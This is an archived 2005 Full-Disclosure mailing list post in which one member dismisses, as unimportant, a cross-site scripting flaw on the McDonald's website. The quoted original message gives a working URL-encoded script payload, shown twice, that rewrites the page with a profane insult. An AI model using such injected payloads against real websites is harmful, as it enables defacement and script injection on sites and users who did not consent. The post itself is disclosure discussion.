lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <4274F756.3080700@securinews.com>
Date: Sun May  1 16:36:08 2005
From: seclists at securinews.com (Paul Kurczaba)
Subject: Micky-dee's anyone?

Just another case of cross site scripting. I would understand people 
caring if it was a bank's site...but McDonalds?

tuytumadre@....net wrote:
> To all you people that like McDonalds, here is a quick link that may 
> show you the light:
>  
> http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2 
> F%73%63%72%69%70%74%3E 
> <http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2F%73%63%72%69%70%74%3E>
>  
> Interesting, huh?
>  
> Regards,
> Pauil
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ